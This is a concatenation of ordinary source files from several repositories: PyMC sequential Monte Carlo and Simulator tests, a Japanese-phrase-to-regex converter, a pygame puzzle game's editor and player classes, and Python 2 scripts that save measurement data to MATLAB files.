assert np.isclose(smc.prior_logp_func(floatX(np.array([-0.49]))), np.log(0.3))
assert np.isclose(smc.prior_logp_func(floatX(np.array([0.49]))), np.log(0.3))
assert np.isclose(smc.prior_logp_func(floatX(np.array([0.51]))), np.log(0.7))
assert smc.prior_logp_func(floatX(np.array([1.51]))) == -np.inf
def test_unobserved_discrete(self):
n = 10
rng = self.get_random_state()
z_true = np.zeros(n, dtype=int)
z_true[int(n / 2) :] = 1
y = st.norm(np.array([-1, 1])[z_true], 0.25).rvs(random_state=rng)
with pm.Model() as m:
z = pm.Bernoulli("z", p=0.5, size=n)
mu = pm.math.switch(z, 1.0, -1.0)
like = pm.Normal("like", mu=mu, sigma=0.25, observed=y)
trace = pm.sample_smc(chains=1, return_inferencedata=False)
assert np.all(np.median(trace["z"], axis=0) == z_true)
def test_marginal_likelihood(self):
"""
Verifies that the log marginal likelihood function
can be correctly computed for a Beta-Bernoulli model.
"""
data = np.repeat([1, 0], [50, 50])
marginals = []
a_prior_0, b_prior_0 = 1.0, 1.0
a_prior_1, b_prior_1 = 20.0, 20.0
for alpha, beta in ((a_prior_0, b_prior_0), (a_prior_1, b_prior_1)):
with pm.Model() as model:
a = pm.Beta("a", alpha, beta)
y = pm.Bernoulli("y", a, observed=data)
trace = pm.sample_smc(2000, chains=2, return_inferencedata=False)
# log_marginal_likelihood is found in the last value of each chain
lml = np.mean([chain[-1] for chain in trace.report.log_marginal_likelihood])
marginals.append(lml)
# compare to the analytical result
assert abs(np.exp(marginals[1] - marginals[0]) - 4.0) <= 1
def test_start(self):
with pm.Model() as model:
a = pm.Poisson("a", 5)
b = pm.HalfNormal("b", 10)
y = pm.Normal("y", a, b, observed=[1, 2, 3, 4])
start = {
"a": np.random.poisson(5, size=500),
"b_log__": np.abs(np.random.normal(0, 10, size=500)),
}
trace = pm.sample_smc(500, chains=1, start=start)
def test_kernel_kwargs(self):
with self.fast_model:
trace = pm.sample_smc(
draws=10,
chains=1,
threshold=0.7,
correlation_threshold=0.02,
return_inferencedata=False,
kernel=pm.smc.IMH,
)
assert trace.report.threshold == 0.7
assert trace.report.n_draws == 10
assert trace.report.correlation_threshold == 0.02
with self.fast_model:
trace = pm.sample_smc(
draws=10,
chains=1,
threshold=0.95,
correlation_threshold=0.02,
return_inferencedata=False,
kernel=pm.smc.MH,
)
assert trace.report.threshold == 0.95
assert trace.report.n_draws == 10
assert trace.report.correlation_threshold == 0.02
@pytest.mark.parametrize("chains", (1, 2))
def test_return_datatype(self, chains):
draws = 10
with self.fast_model:
idata = pm.sample_smc(chains=chains, draws=draws)
mt = pm.sample_smc(chains=chains, draws=draws, return_inferencedata=False)
assert isinstance(idata, InferenceData)
assert "sample_stats" in idata
assert idata.posterior.dims["chain"] == chains
assert idata.posterior.dims["draw"] == draws
assert isinstance(mt, MultiTrace)
assert mt.nchains == chains
assert mt["x"].size == chains * draws
def test_convergence_checks(self):
with self.fast_model:
with pytest.warns(
UserWarning,
match="The number of samples is too small",
):
pm.sample_smc(draws=99)
def test_deprecated_parallel_arg(self):
with self.fast_model:
with pytest.warns(
FutureWarning,
match="The argument parallel is deprecated",
):
pm.sample_smc(draws=10, chains=1, parallel=False)
def test_deprecated_abc_args(self):
with self.fast_model:
with pytest.warns(
FutureWarning,
match='The kernel string argument "ABC" in sample_smc has been deprecated',
):
pm.sample_smc(draws=10, chains=1, kernel="ABC")
with pytest.warns(
FutureWarning,
match='The kernel string argument "Metropolis" in sample_smc has been deprecated',
):
pm.sample_smc(draws=10, chains=1, kernel="Metropolis")
with pytest.warns(
FutureWarning,
match="save_sim_data has been deprecated",
):
pm.sample_smc(draws=10, chains=1, save_sim_data=True)
with pytest.warns(
FutureWarning,
match="save_log_pseudolikelihood has been deprecated",
):
pm.sample_smc(draws=10, chains=1, save_log_pseudolikelihood=True)
class TestSimulator(SeededTest):
"""
Tests for pm.Simulator. They are included in this file because Simulator was
designed primarily to be used with SMC sampling.
"""
@staticmethod
def count_rvs(end_node):
return len(
[
node
for node in ancestors([end_node])
if node.owner is not None and isinstance(node.owner.op, RandomVariable)
]
)
@staticmethod
def normal_sim(rng, a, b, size):
return rng.normal(a, b, size=size)
@staticmethod
def abs_diff(eps, obs_data, sim_data):
return np.mean(np.abs((obs_data - sim_data) / eps))
@staticmethod
def quantiles(x):
return np.quantile(x, [0.25, 0.5, 0.75])
def setup_class(self):
super().setup_class()
self.data = np.random.normal(loc=0, scale=1, size=1000)
with pm.Model() as self.SMABC_test:
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator("s", self.normal_sim, a, b, sum_stat="sort", observed=self.data)
self.s = s
with pm.Model() as self.SMABC_potential:
a = pm.Normal("a", mu=0, sigma=1, initval=0.5)
b = pm.HalfNormal("b", sigma=1)
c = pm.Potential("c", pm.math.switch(a > 0, 0, -np.inf))
s = pm.Simulator("s", self.normal_sim, a, b, observed=self.data)
def test_one_gaussian(self):
assert self.count_rvs(self.SMABC_test.logpt()) == 1
with self.SMABC_test:
trace = pm.sample_smc(draws=1000, chains=1, return_inferencedata=False)
pr_p = pm.sample_prior_predictive(1000, return_inferencedata=False)
po_p = pm.sample_posterior_predictive(
trace, keep_size=False, return_inferencedata=False
)
assert abs(self.data.mean() - trace["a"].mean()) < 0.05
assert abs(self.data.std() - trace["b"].mean()) < 0.05
assert pr_p["s"].shape == (1000, 1000)
assert abs(0 - pr_p["s"].mean()) < 0.15
assert abs(1.4 - pr_p["s"].std()) < 0.10
assert po_p["s"].shape == (1000, 1000)
assert abs(self.data.mean() - po_p["s"].mean()) < 0.10
assert abs(self.data.std() - po_p["s"].std()) < 0.10
@pytest.mark.parametrize("floatX", ["float32", "float64"])
def test_custom_dist_sum_stat(self, floatX):
with aesara.config.change_flags(floatX=floatX):
with pm.Model() as m:
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator(
"s",
self.normal_sim,
a,
b,
distance=self.abs_diff,
sum_stat=self.quantiles,
observed=self.data,
)
assert self.count_rvs(m.logpt()) == 1
with m:
pm.sample_smc(draws=100)
@pytest.mark.parametrize("floatX", ["float32", "float64"])
def test_custom_dist_sum_stat_scalar(self, floatX):
"""
Test that automatically wrapped functions cope well with scalar inputs
"""
scalar_data = 5
with aesara.config.change_flags(floatX=floatX):
with pm.Model() as m:
s = pm.Simulator(
"s",
self.normal_sim,
0,
1,
distance=self.abs_diff,
sum_stat=self.quantiles,
observed=scalar_data,
)
assert self.count_rvs(m.logpt()) == 1
with pm.Model() as m:
s = pm.Simulator(
"s",
self.normal_sim,
0,
1,
distance=self.abs_diff,
sum_stat="mean",
observed=scalar_data,
)
assert self.count_rvs(m.logpt()) == 1
def test_model_with_potential(self):
assert self.count_rvs(self.SMABC_potential.logpt()) == 1
with self.SMABC_potential:
trace = pm.sample_smc(draws=100, chains=1, return_inferencedata=False)
assert np.all(trace["a"] >= 0)
def test_simulator_metropolis_mcmc(self):
with self.SMABC_test as m:
step = pm.Metropolis([m.rvs_to_values[m["a"]], m.rvs_to_values[m["b"]]])
trace = pm.sample(step=step, return_inferencedata=False)
assert abs(self.data.mean() - trace["a"].mean()) < 0.05
assert abs(self.data.std() - trace["b"].mean()) < 0.05
def test_multiple_simulators(self):
true_a = 2
true_b = -2
data1 = np.random.normal(true_a, 0.1, size=1000)
data2 = np.random.normal(true_b, 0.1, size=1000)
with pm.Model() as m:
a = pm.Normal("a", mu=0, sigma=3)
b = pm.Normal("b", mu=0, sigma=3)
sim1 = pm.Simulator(
"sim1",
self.normal_sim,
a,
0.1,
distance="gaussian",
sum_stat="sort",
observed=data1,
)
sim2 = pm.Simulator(
"sim2",
self.normal_sim,
b,
0.1,
distance="laplace",
sum_stat="mean",
epsilon=0.1,
observed=data2,
)
assert self.count_rvs(m.logpt()) == 2
# Check that the logps use the correct methods
a_val = m.rvs_to_values[a]
sim1_val = m.rvs_to_values[sim1]
logp_sim1 = pm.joint_logpt(sim1, sim1_val)
logp_sim1_fn = aesara.function([a_val], logp_sim1)
b_val = m.rvs_to_values[b]
sim2_val = m.rvs_to_values[sim2]
logp_sim2 = pm.joint_logpt(sim2, sim2_val)
logp_sim2_fn = aesara.function([b_val], logp_sim2)
assert any(
node for node in logp_sim1_fn.maker.fgraph.toposort() if isinstance(node.op, SortOp)
)
assert not any(
node for node in logp_sim2_fn.maker.fgraph.toposort() if isinstance(node.op, SortOp)
)
with m:
trace = pm.sample_smc(return_inferencedata=False)
assert abs(true_a - trace["a"].mean()) < 0.05
assert abs(true_b - trace["b"].mean()) < 0.05
def test_nested_simulators(self):
true_a = 2
rng = self.get_random_state()
data = rng.normal(true_a, 0.1, size=1000)
with pm.Model() as m:
sim1 = pm.Simulator(
"sim1",
self.normal_sim,
params=(0, 4),
distance="gaussian",
sum_stat="identity",
)
sim2 = pm.Simulator(
"sim2",
self.normal_sim,
params=(sim1, 0.1),
distance="gaussian",
sum_stat="mean",
epsilon=0.1,
observed=data,
)
assert self.count_rvs(m.logpt()) == 2
with m:
trace = pm.sample_smc(return_inferencedata=False)
assert np.abs(true_a - trace["sim1"].mean()) < 0.1
def test_upstream_rngs_not_in_compiled_logp(self):
smc = IMH(model=self.SMABC_test)
smc.initialize_population()
smc._initialize_kernel()
likelihood_func = smc.likelihood_logp_func
# Test graph is stochastic
inarray = floatX(np.array([0, 0]))
assert likelihood_func(inarray) != likelihood_func(inarray)
# Test only one shared RNG is present
compiled_graph = likelihood_func.maker.fgraph.outputs
shared_rng_vars = [
node
for node in ancestors(compiled_graph)
if isinstance(node, (RandomStateSharedVariable, RandomGeneratorSharedVariable))
]
assert len(shared_rng_vars) == 1
def test_simulator_error_msg(self):
msg = "The distance metric not_real is not implemented"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, 1, distance="not_real")
msg = "The summary statistic not_real is not implemented"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, 1, sum_stat="not_real")
msg = "Cannot pass both unnamed parameters and `params`"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, params=(1))
@pytest.mark.xfail(reason="KL not refactored")
def test_automatic_use_of_sort(self):
with pm.Model() as model:
s_k = pm.Simulator(
"s_k",
None,
params=None,
distance="kullback_leibler",
sum_stat="sort",
observed=self.data,
)
assert s_k.distribution.sum_stat is pm.distributions.simulator.identity
def test_name_is_string_type(self):
with self.SMABC_potential:
assert not self.SMABC_potential.name
trace = pm.sample_smc(draws=10, chains=1, return_inferencedata=False)
assert isinstance(trace._straces[0].name, str)
def test_named_model(self):
# Named models used to fail with Simulator because the arguments to the
# random fn used to be passed by name. This is no longer true.
# https://github.com/pymc-devs/pymc/pull/4365#issuecomment-761221146
name = "NamedModel"
with pm.Model(name=name):
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator("s", self.normal_sim, a, b, observed=self.data)
trace = pm.sample_smc(draws=10, chains=2, return_inferencedata=False)
assert f"{name}::a" in trace.varnames
assert f"{name}::b" in trace.varnames
assert f"{name}::b_log__" in trace.varnames
class TestMHKernel(SeededTest):
def test_normal_model(self):
data = st.norm(10, 0.5).rvs(1000, random_state=self.get_random_state())
initial_rng_state = np.random.get_state()
with pm.Model() as m:
mu = pm.Normal("mu", 0, 3)
sigma = pm.HalfNormal("sigma", 1)
y = pm.Normal("y", mu, sigma, observed=data)
idata = pm.sample_smc(draws=2000, kernel=pm.smc.MH)
assert_random_state_equal(initial_rng_state, np.random.get_state())
post = idata.posterior.stack(sample=("chain", "draw"))
assert np.abs(post["mu"].mean() - 10) < 0.1
assert np.abs(post["sigma"].mean() - 0.5) < 0.05
def test_proposal_dist_shape(self):
with pm.Model() as m:
x = pm.Normal("x", 0, 1)
y = pm.Normal("y", x, 1, observed=0)
trace = pm.sample_smc(
draws=10,
chains=1,
kernel=pm.smc.MH,
return_inferencedata=False,
)
``` |
{
"source": "5hyn3/JPNStoRegex",
"score": 3
} |
#### File: 5hyn3/JPNStoRegex/jpns_to_regex.py
```python
import re
class JPNStoRegex:
# Register the regex operator that corresponds to each token
token_table = {}
token_table['タブ'] = '\t'
token_table['任意の文字'] = '.'
token_table['英数字'] = r'\w'
token_table['英数字以外'] = r'\W'
token_table['空白文字'] = r'\s'
token_table['空白文字以外'] = r'\S'
token_table['半角数字'] = r'\d'
token_table['半角数字以外'] = r'\D'
token_table['単語境界'] = r'\b'
token_table['か'] = '|'
token_table['全角数字'] = '[0-9]'
token_table['ひらがな'] = '[ぁ - ん]'
token_table['カタカナ'] = '[ァ - ヴ]'
token_table['半角カタカナ'] = '[ヲ - ゚]'
token_table['('] = '('
token_table[')'] = ')'
token_table['が0回以上'] = '*'
token_table['が1回以上'] = '+'
token_table['が0回または1回'] = '?'
token_table['行頭'] = '^'
token_table['行末'] = '$'
# Regexes for detecting and replacing the counted quantifiers ("n times", "n or more", "n to m times")
match = r"が(\d+)回"
match_repatter = re.compile(match)
more = r"が(\d+)回以上"
more_repatter = re.compile(more)
more_less = r"が(\d+)回以上(\d+)回以下"
more_less_repatter = re.compile(more_less)
def __init__(self, text):
self.text = text
raw_tokens = text.split(' ')
# recover literal half-width spaces from the split tokens
self.tokens = self.get_half_space(raw_tokens)
def get_regex(self):
text = ''
for token in self.tokens:
# a leading '$' forces the rest of the token to be treated as a literal string
if token[0] == '$':
token = token[1:]
text += token
continue
if token in self.token_table.keys():
# replace the token with its regex operator
text += self.token_table[token]
continue
else:
if self.more_less_repatter.match(token):
text += re.sub(self.more_less_repatter, "{\\1,\\2}", token)
continue
if self.more_repatter.match(token):
text += re.sub(self.more_repatter, "{\\1,}", token)
continue
if self.match_repatter.match(token):
text += re.sub(self.match_repatter, "{\\1}", token)
continue
# fall back to treating the token as a literal string
text += token
return text
def get_half_space(self, raw_tokens):
while '' in raw_tokens:
index = raw_tokens.index('')
if raw_tokens[index+1] == '':
# two consecutive empty elements mean a literal half-width space
raw_tokens.insert(index, ' ')
raw_tokens.remove('')
raw_tokens.remove('')
else:
# drop the extra empty element
raw_tokens.remove('')
return raw_tokens
``` |
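A small usage sketch for the converter above (hypothetical input; tokens are separated by single spaces and looked up in `token_table`):
```python
# "行頭 半角数字 が1回以上 行末" reads roughly as "line start, digit, one or more, line end".
converter = JPNStoRegex("行頭 半角数字 が1回以上 行末")
print(converter.get_regex())  # expected: ^\d+$

# A token prefixed with '$' is copied through as a literal string.
print(JPNStoRegex("行頭 $abc 行末").get_regex())  # expected: ^abc$
```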
{
"source": "5igmatic/puzzle_game",
"score": 3
} |
#### File: puzzle_game/Game/editor.py
```python
import pygame
from tile import Tile
from player import Player
class Editor:
def __init__(self, size, font, WIN):
self.editorActive = False
self.cameraSpeed = 5
self.cameraX = 0
self.cameraY = 0
self.activePlayer = None
self.rotationCooldown = 0
self.rotationCooldownDuration = 20
self.tiles = pygame.sprite.Group()
self.players = pygame.sprite.Group()
self.playerIndex = 0
self.size = size
self.font = font
self.WIN = WIN
width = self.WIN.get_width()
self.exitButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.exitButton.fill("white")
self.exitButtonRect = self.exitButton.get_rect(center = (width-20, 20))
self.restartButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.restartButton.fill("white")
self.restartButtonRect = self.restartButton.get_rect(center = (width-60, 20))
self.playButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.playButton.fill("white")
self.playButtonRect = self.playButton.get_rect(center = (width-100, 20))
self.equationKeys = {pygame.K_0: "0",
pygame.K_1: "1",
pygame.K_2: "2",
pygame.K_3: "3",
pygame.K_4: "4",
pygame.K_5: "5",
pygame.K_6: "6",
pygame.K_7: "7",
pygame.K_8: "8",
pygame.K_9: "9",
pygame.K_EQUALS: "=",
pygame.K_x: "x",
pygame.K_SLASH: "÷",
pygame.K_p: "+",
pygame.K_MINUS: "-"}
def initialise(self, width, height):
self.tiles.empty()
self.players.empty()
self.width = width
self.height = height
self.cameraX = width/2-0.5
self.cameraY = height/2-0.5
self.tilePositions = [[" "]*width for i in range(height)]
for index in range(width):
self.tilePositions[0][index] = "t"
self.tilePositions[-1][index] = "t"
newTile = Tile(index, 0, self.size)
self.tiles.add(newTile)
newTile = Tile(index, height-1, self.size)
self.tiles.add(newTile)
for index,tileRow in enumerate(self.tilePositions):
tileRow[0] = "t"
tileRow[width-1] = "t"
newTile = Tile(0, index, self.size)
self.tiles.add(newTile)
newTile = Tile(width-1, index, self.size)
self.tiles.add(newTile)
def doMovement(self):
keys = pygame.key.get_pressed()
if keys[pygame.K_w]:
self.cameraY -= self.cameraSpeed/self.size
if keys[pygame.K_s]:
self.cameraY += self.cameraSpeed/self.size
if keys[pygame.K_a]:
self.cameraX -= self.cameraSpeed/self.size
if keys[pygame.K_d]:
self.cameraX += self.cameraSpeed/self.size
if keys[pygame.K_t]:
self.placeTile()
for key in self.equationKeys:
if keys[key]:
self.activePlayer.type = self.equationKeys[key]
self.activePlayer.text.updateText(self.equationKeys[key])
if keys[pygame.K_BACKSPACE]:
self.tilePositions[self.activePlayer.y][self.activePlayer.x] = " "
self.players.remove(self.activePlayer)
if self.rotationCooldown == 0:
if keys[pygame.K_r]:
self.activePlayer.rotation += 90
self.activePlayer.updateRotation()
self.rotationCooldown = self.rotationCooldownDuration
else:
self.rotationCooldown -= 1
self.convertLayoutToList()
def validLevel(self):
for player in self.players:
if player.type == "=":
return True
return False
def mouseClick(self):
for player in self.players:
#gets the pixel location of the center of the player
playerScreenPosX = (player.x - self.cameraX) * self.size + self.WIN.get_width()/2
playerScreenPosY = (player.y - self.cameraY) * self.size + self.WIN.get_height()/2
rect = player.image.get_rect(center = (playerScreenPosX, playerScreenPosY))
if rect.collidepoint(pygame.mouse.get_pos()):
self.setActivePlayer(player)
def setActivePlayer(self, player):
if self.activePlayer != None:
self.activePlayer.original_image.fill("white")
self.activePlayer.image = self.activePlayer.original_image
self.activePlayer = player
self.activePlayer.original_image.fill("grey")
self.activePlayer.image = self.activePlayer.original_image
def placeTile(self):
mousePos = pygame.mouse.get_pos()
mousePosX = (mousePos[0]-self.WIN.get_width()/2)/self.size
mousePosY = (mousePos[1]-self.WIN.get_height()/2)/self.size
gridX = mousePosX + self.cameraX
gridY = mousePosY + self.cameraY
gridX = round(gridX)
gridY = round(gridY)
if gridX > 0 and gridX < self.width-1 and gridY > 0 and gridY < self.height-1:
unoccupied = True
for player in self.players:
if gridX == player.x and gridY == player.y:
unoccupied = False
if unoccupied:
newPlayer = Player(self.playerIndex, " ", gridX, gridY, 0, self)
self.players.add(newPlayer)
self.setActivePlayer(newPlayer)
self.playerIndex += 1
def updateIndividual(self, object, shiftX, shiftY):
x = round(self.size*(object.x + shiftX))
y = round(self.size*(object.y + shiftY))
rect = object.image.get_rect(center = (x, y))
self.WIN.blit(object.image, rect)
def updateEditor(self):
screenCenterX = self.WIN.get_width()/(2*self.size)
screenCenterY = self.WIN.get_height()/(2*self.size)
shiftX = screenCenterX - self.cameraX
shiftY = screenCenterY - self.cameraY
for tile in self.tiles:
self.updateIndividual(tile, shiftX, shiftY)
for player in self.players:
self.updateIndividual(player, shiftX, shiftY)
self.updateIndividual(player.text, shiftX, shiftY)
self.WIN.blit(self.exitButton, self.exitButtonRect)
self.WIN.blit(self.restartButton, self.restartButtonRect)
self.WIN.blit(self.playButton, self.playButtonRect)
def convertLayoutToList(self):
self.tileRotations = [[" "]*self.width for i in range(self.height)]
for player in self.players:
if player.type == " ": player.type = "t"
self.tilePositions[player.y][player.x] = player.type
self.tileRotations[player.y][player.x] = str(int(player.rotation % 360 / 90))
self.layout = []
for row in range(self.height):
positionsRow = ""
rotationsRow = ""
for position in self.tilePositions[row]:
positionsRow += position
for rotation in self.tileRotations[row]:
rotationsRow += rotation
rowData = [positionsRow, rotationsRow]
self.layout.append(rowData)
```
#### File: puzzle_game/Game/player.py
```python
import pygame
import math
from text import Text
class Player(pygame.sprite.Sprite):
def __init__(self, index, type, x, y, rotation, level):
super().__init__()
self.index = index
self.type = type
self.x = x
self.y = y
self.rotation = rotation
self.size = level.size
self.level = level
self.original_image = pygame.Surface((self.size, self.size)).convert_alpha()
self.original_image.fill("white")
self.image = pygame.transform.rotate(self.original_image, self.rotation)
self.text = Text(type, x, y, level.font)
self.instruction = 0
self.direction = 1
self.jumpDirection = 1
self.walkFrames = 30
self.walkRotation = 0
self.fallFrames = 18
self.jumpFrames = 24
self.jumpedDist = 0
self.cornerLeeway = 0.2
self.triedDirections = []
# def updateSize(self, size):
# self.size = size
# self.image = pygame.transform.scale(self.image, (size, size))
def doMovement(self):
if self.instruction == 0 and self.level.playerChangeCooldown == 0:
self.checkInputs()
#if a movement has just been initiated, remove the player from its previous position
if self.instruction != 0:
self.level.playerPositionIndecies[round(self.y)][round(self.x)] = None
self.level.playerPositionSymbols[round(self.y)][round(self.x)] = None
if self.instruction == 1:
self.fall()
if self.instruction == 2:
self.walk()
if self.instruction == 3:
self.jump()
self.triedDirections.clear()
self.text.x = self.x
self.text.y = self.y
self.updateRotation()
def updateRotation(self):
self.text.image = pygame.transform.rotate(self.text.original_image, self.rotation)
self.image = pygame.transform.rotate(self.original_image, self.rotation)
def checkInputs(self):
keys = pygame.key.get_pressed()
if 1 not in self.triedDirections:
self.instruction = 1
self.triedDirections.append(1)
elif keys[pygame.K_a] and [2, -1] not in self.triedDirections:
self.instruction = 2
self.direction = -1
self.walkRotation = self.rotation % 90 + 45
self.triedDirections.append([2, -1])
elif keys[pygame.K_d] and [2, 1] not in self.triedDirections:
self.instruction = 2
self.direction = 1
self.walkRotation = self.rotation % 90 + 135
self.triedDirections.append([2, 1])
elif keys[pygame.K_q] and [3, -1] not in self.triedDirections:
self.instruction = 3
self.direction = -1
self.jumpedDist = 0
self.jumpDirection = 1
self.triedDirections.append([3, -1])
elif keys[pygame.K_e] and [3, 1] not in self.triedDirections:
self.instruction = 3
self.direction = 1
self.jumpedDist = 0
self.jumpDirection = 1
self.triedDirections.append([3, 1])
elif keys[pygame.K_w]:
shift = 1
self.level.changePlayer(shift)
elif keys[pygame.K_s]:
shift = -1
self.level.changePlayer(shift)
def movementEnd(self):
self.instruction = 0
self.x = round(self.x*self.size)/self.size
self.y = round(self.y*self.size)/self.size
self.level.playerPositionIndecies[round(self.y)][round(self.x)] = self.index
self.level.playerPositionSymbols[round(self.y)][round(self.x)] = self.type
self.doMovement()
def fall(self):
self.y += 1/self.fallFrames
if self.level.collision(self):
self.y -= 1/self.fallFrames
self.movementEnd()
def walk(self):
self.walkMovement(90/self.walkFrames)
if self.level.collision(self):
change = self.rotation % 90
if change > 45: change -= 90
else: change = -change
self.walkMovement(change)
self.movementEnd()
def walkMovement(self, change):
previousRotation = self.walkRotation
self.walkRotation -= self.direction * change
self.rotation -= self.direction * change
self.x += math.sqrt(2)/2*(math.cos(self.walkRotation*math.pi/180) - math.cos(previousRotation*math.pi/180))
self.y -= math.sqrt(2)/2*(math.sin(self.walkRotation*math.pi/180) - math.sin(previousRotation*math.pi/180))
self.image = pygame.transform.rotate(self.original_image, self.rotation)
def jump(self):
self.jumpMovement(self.jumpDirection/self.jumpFrames)
if self.level.collision(self):
self.jumpMovement(-self.jumpDirection/self.jumpFrames)
if self.rotation % 90 == 0:
self.jumpedDist = 0
self.movementEnd()
else:
angle = 135 - self.rotation % 90
cornerX = self.x + math.sqrt(2)/2*(math.cos(angle*math.pi/180))
cornerY = self.y + math.sqrt(2)/2*(math.sin(angle*math.pi/180))
if cornerX % 1 < 0.5 + self.cornerLeeway and cornerX % 1 > 0.5 - self.cornerLeeway and cornerY % 1 < 0.5 + self.cornerLeeway and cornerY % 1 > 0.5 - self.cornerLeeway:
self.instruction = 2
self.jumpedDist = 0
self.walkRotation = self.rotation % 90 + 45
cornerX = round(cornerX-0.5)+0.5
cornerY = round(cornerY-0.5)+0.5
self.x = cornerX - math.sqrt(2)/2*(math.cos(angle*math.pi/180))
self.y = cornerY - math.sqrt(2)/2*(math.sin(angle*math.pi/180))
else:
self.instruction = 3
self.jumpDirection = -1
self.doMovement()
def jumpMovement(self, change):
self.x += self.direction * change
self.y += (2/3)*(((self.jumpedDist+change)*(self.jumpedDist+change)-4*(self.jumpedDist+change)) - (self.jumpedDist*self.jumpedDist-4*self.jumpedDist))
self.jumpedDist += change
self.rotation -= self.direction * 90 * change
self.image = pygame.transform.rotate(self.original_image, self.rotation)
``` |
{
"source": "5igno/oedus",
"score": 3
} |
#### File: Measurements/Save Data/Pickle2Workspace.py
```python
import sys
import pickle
import copy
import scipy.io as sio
""" Picke2Workspace Function """
def Pickle2Workspace(pmat_filepath):
pmat_file_handle = open(pmat_filepath, 'rb')  # pickle files should be opened in binary mode
workspace = pickle.load(pmat_file_handle)
pmat_file_handle.close()
# Define new file path
mat_filepath = pmat_filepath[0:-6]
fileName = workspace.keys()[0]
content = workspace[fileName].keys()
if 'StressSequence' in content:
"""
Reorder Stress Sequence in Buffer so that Instrument Sequence step is
the first index and the Stress step is the second one
"""
# Define New data types
newWorkspace = {fileName:{}}
emptyInstrumentSequence = {'StressSequence':[]}
# Copy the device information
if 'DeviceInfo' in content:
newWorkspace[fileName]['DeviceInfo'] = workspace[fileName]['DeviceInfo']
# Extract the StressSequence
stressSequence = workspace[fileName]['StressSequence']
newInstrumentSequence = []
#For each step of the stress sequence
for stressStep in stressSequence:
#get the set of measurements done
instrumentSequence = stressStep['InstrumentSequence']
# and with each measurement (index needed)
for id_measurement in range(0,len(instrumentSequence)):
measurement = instrumentSequence[id_measurement].copy()
# add the motor position information
measurement['MotorPosition'] = stressStep['MotorPosition']
#If there no element in the list for this measurement
if id_measurement >= len(newInstrumentSequence):
# just create an empty one
newInstrumentSequence.append({'StressSequence':[]})
#and store in the new array of measurements
newInstrumentSequence[id_measurement]['StressSequence'].append(measurement.copy())
'''
#some debugging stuff
print 'Instrument Sequence Length: '+str(len(instrumentSequence))
print 'Measurement Index: '+str(id_measurement)
print 'New Instrument Sequence Length: '+str(len(newInstrumentSequence[id_measurement]['StressSequence']))
#print 'Empty Instrument Sequence: '+str(len(emptyInstrumentSequence['StressSequence']))
raw_input()
'''
# Now store everything in a new workspace
newWorkspace[fileName]['InstrumentSequence'] = newInstrumentSequence
# Save to file
sio.savemat(mat_filepath,newWorkspace)
else:
# No StressSequence = No transformation to do: just save what you have
sio.savemat(mat_filepath,workspace)
return
""" Main program """
pmat_filepath = ''
arglist = sys.argv[1:]
for ix in range(len(arglist)):
pmat_filepath = pmat_filepath + arglist[ix] + ' '
print "Converting Pickled Workspace to Workspace file"
print "File path: "+pmat_filepath
Pickle2Workspace(pmat_filepath)
```
#### File: Measurements/Save Data/Test_Python2Matlab_Builtin.py
```python
import scipy.io as sio
import numpy as np
# Define some configuration strings for HP and switching matrix
parameter_analyzer_configuration = 'insert here the configuration of the parameter analyzer'
switching_matrix_configuration = 'insert here the configuration of the switching matrix'
device_info_string = 'insert here the information about the device under test'
# Define trial vectors for current and voltage
""" With Built-in data types: tuples """
tpl_array = tuple([float(x) for x in tuple(range(1,11))])
matrix = (tpl_array,tpl_array,tpl_array,tpl_array)
destination_path = "struct_test.mat"
# Lists and tuples are imported in the same way, as an array
class MeasurementStep:
def ConfigParameterAnalyzer(self, configuration):
""" Creates a field for the parameter analyzer configuration """
self.parameter_analyzer = configuration
def ConfigSwitchingMatrix(self, configuration):
""" Creates a field for the switching matrix configuration """
self.switching_matrix = configuration
def SetElectricalMeasurement(self, current_traces, voltage_traces):
""" creates or updates the current and voltage measurement fields """
self.current = current_traces
self.voltage = voltage_traces
x = MeasurementStep
type_instrument_sequence = [('parameter_analyzer','O'),('switching_matrix','O'),
('current','O'), ('voltage','O')]
instrument_sequence = np.zeros(2,dtype = type_instrument_sequence)
# Fillup the instrument_sequence
for id_isnt in range(len(instrument_sequence)):
instrument_sequence[id_isnt]['parameter_analyzer'] = str(id_isnt) + parameter_analyzer_configuration
instrument_sequence[id_isnt]['switching_matrix'] = str(id_isnt) + switching_matrix_configuration
instrument_sequence[id_isnt]['current'] = np.array(zip(*matrix)) # zip(*...) transposes; 'matrix' stands in for the trial current traces
instrument_sequence[id_isnt]['voltage'] = np.array(zip(*matrix)) # same trial vectors reused for voltage
type_stress_sequence = [('motor_position',np.float64),('instrument_sequence',np.object)]
stress_sequence = np.zeros(3,dtype = type_stress_sequence)
# Fillup the stress_sequence
for id_stress in range(len(stress_sequence)):
stress_sequence[id_stress]['instrument_sequence'] = instrument_sequence
stress_sequence[id_stress]['motor_position'] = id_stress
measurement = {'device_info':device_info_string,'stress_sequence':stress_sequence}
# workspace = {'device_info':device_info_string,'measurement':measurement}
workspace = {'device_info':device_info_string,'instrument_sequence':instrument_sequence,'stress_sequence':stress_sequence,'measurement':measurement}
workspace = {'measurement':measurement}
sio.savemat(destination_path,workspace)
#return sio.savemat(destination_path,workspace)
""" Would be nice to place the instrument_sequence array and the device_info_string
into a single structure to save as workspace """
#type_measurement = [('instrument_sequence',type_instrument_sequence),
# ('device_info','O')]
#
#
#measurement = np.zeros(1,dtype = type_measurement)
#
#measurement['instrument_sequence'] = instrument_sequence
#measurement['device_info'] = device_info_string
#
#workspace = {'device_info':device_info_string,
# 'instrument_sequence':instrument_sequence,
# 'measurement':measurement}
#
#sio.savemat("C:\Users\gio\Desktop\struct_test.mat",workspace)
import sys
sys.path.insert(1, 'C:\\Python27\\lib\\site-packages\\IPython\\extensions')
``` |
{
"source": "5iyxxf/codex-team",
"score": 2
} |
#### File: 5iyxxf/codex-team/main.py
```python
import socket
import ssl
import datetime
import requests
import sys
import whois
